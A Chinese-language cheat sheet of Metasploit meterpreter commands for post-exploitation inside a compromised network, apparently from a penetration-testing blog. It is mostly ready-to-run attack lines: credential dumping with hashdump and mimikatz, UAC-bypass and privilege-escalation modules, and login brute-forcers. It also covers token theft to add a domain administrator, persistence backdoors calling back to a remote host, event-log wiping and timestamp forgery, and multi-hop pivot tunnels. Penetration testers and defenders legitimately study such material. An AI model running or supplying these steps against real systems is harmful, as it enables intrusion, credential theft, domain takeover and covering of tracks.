meterpreter 在内网中的作用，就如同 sqlmap 和 burpsuite 在 web 测试中的价值一样。本文只涉及内网，持续更新。

0x01 枚举linux可用信息 | windows

run post/linux/gather/hashdump              #hash密码
run post/linux/gather/checkvm               #是否虚拟机
run post/linux/gather/enum_configs          #枚举配置信息
run post/linux/gather/enum_network          #枚举网络配置
run post/linux/gather/enum_protections      #发现像IDS,防病毒,防火墙等
run post/linux/gather/enum_system           #获取有关用户帐户/软件/服务/Linux版本
run post/linux/gather/enum_users_history    #枚举历史信息
run post/windows/gather/arp_scanner         #通过 sessions -i number 选中的会话做 ARP 扫描，发现同网段存活 IP
run post/windows/escalate/getsystem         #getsystem
run post/windows/gather/credentials/gpp     #寻找储存在SYSVOL中的Groups.xml
post/windows/gather/enum_unattend           #全盘搜索Unattend.xml文件查找账户密码
exploit/windows/local/always_install_elevated       #创建一个随机文件名的MSI文件并在提权成功后删除所有已部署的文件

run vnc
run scraper                                 #常见信息收集[好用,没有之一]

0x02 Bypass-modules

exploit/windows/local/bypassuac_vbs         #会生成新的session[getsystem]
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_eventvwr
exploit/windows/local/bypassuac
exploit/windows/local/ask
exploit/windows/local/ms13_053_schlamperei
exploit/windows/local/ms14_058_track_popup_menu
exploit/windows/local/ms16_016_webdav       #Windows 7 SP1
exploit/windows/local/ms16_032_secondary_logon_handle_privesc
exploit/windows/local/trusted_service_path
exploit/windows/local/service_permissions

0x03 service-attack-modules

use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/ftp/ftp_login
use auxiliary/scanner/ssh/ssh_login
use auxiliary/scanner/telnet/telnet_login
use auxiliary/scanner/smb/smb_login
use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/mysql/mysql_login
use auxiliary/scanner/oracle/oracle_login
use auxiliary/scanner/postgres/postgres_login
use auxiliary/scanner/vnc/vnc_login
use auxiliary/scanner/pcanywhere/pcanywhere_login
use auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/ftp/anonymous

0x04 meterpreter常用命令

pwd |edit |upload |download |getuid |getsystem |sysinfo     #基本命令
python
    python_import <-f file path> [-n mod name] [-r result var name]
    python_execute <python code> [-r result var name]
    python_reset

powershell
    powershell_execute  <powershell code> [-s session-id]
    powershell_import   <path to file> [-s session-id]      #执行本地ps1或者dll
    powershell_shell                                        #会话终端

kiwi
    kiwi_cmd "privilege::debug sekurlsa::logonPasswords"

mimikatz
    wdigest
    mimikatz_command  -f sekurlsa::logonPasswords -a "full"
    mimikatz_command  -f sekurlsa::kerberos -a "full"

sniffer
    sniffer_interfaces
    sniffer_start [网卡id]
    sniffer_stats [网卡id]
    sniffer_dump [绝对路径]

令牌劫持[whoami /groups]
    ps          #查看目标机器进程,找出域控账户运行的进程ID,假如发现PID为 6666
    steal_token 6666 [pid]                  #偷取Token
    use incognito                           #当ps找不到域控账户进程时
    list_tokens –u                          #列出可用token,假如找到域控管理员token
    impersonate_token 2008.com\\dcadministrator     #使用域管理员token运行meterpreter
    add_user hacker password –h 192.168.1.2         #在域控主机上添加账户,ip指向域控
    add_group_user "DomainAdmins" test –h 192.168.1.2    #将账户添加至域管理员组

migrate  pid                                #将 Meterpreter 会话迁移到进程号为 pid 的进程中  [不稳定, explorer.exe]

execute -H -i -f cmd.exe                    #创建新进程cmd.exe,-H不可见,-i交互

timestomp c:/a.txt -c "11/11/2011 11:11:11"  #修改文件的创建时间

arp_scanner -r 192.168.1.0/24

run persistence -X -i 5 -p 2222 -r x.x.x.x  #开机启动项vbs后门 X86_Linux不支持此脚本

run metsvc -A                               #Meterpreter服务后门[windows/metsvc_bind_tcp]

clearev                                     #清除 Windows 事件日志 (Application/System/Security)

run autoroute -s 192.168.1.0/24             #配合 run post/windows/gather/ 系列模块使用

0x05 一级隧道

(前提: 已与目标建立正常的 meterpreter 通信 [re:192.168.1.2])
portfwd add -l 1234 -p 3389 -r x.x.x.x      #将目标的 3389 端口转发到本地 1234 [rdesktop 127.0.0.1:1234]
ssh -f -N -D 127.0.0.1:2222 root@10.1.1.3   #ssh 动态端口转发 (本地 SOCKS 代理)
route add 10.1.1.0 255.255.255.255 1        #添加session 1的路由表[route print]
use auxiliary/server/socks4a                #建立隧道
    vim /etc/proxychains.conf
    socks4  127.0.0.1 1080
proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 --script=smb-vuln-ms08-067.nse 10.1.1.2

0x06 二级隧道

route add 10.1.1.2 255.255.255.255 2        #添加一级隧道路由表
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp    #正向通道
set RHOST 10.1.1.1
set RPORT 2222
use auxiliary/server/socks4a                #建立隧道
    vim /etc/proxychains.conf
    socks4  127.0.0.1 1081
proxychains nmap -sT -sV -p21,22,23,80 -n -Pn -vv 172.16.6.3

0x07 三级隧道

route add 172.16.6.3 255.255.255.255 3      #添加二级隧道路由表
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp    #正向通道
set RHOST 172.16.6.3
set RPORT 3333

0x08 彩蛋

https://www.youtube.com/watch?v=awLMbwj5iP0

https://www.youtube.com/watch?v=wK0r-TZR7w8

相关链接

Windows-Exploit-Suggester

exploit-db

securityfocus

hackingarticles

https://www.youtube.com/watch?v=jCoL7oXvT_E

https://www.youtube.com/watch?v=DlJyKgfkoKQ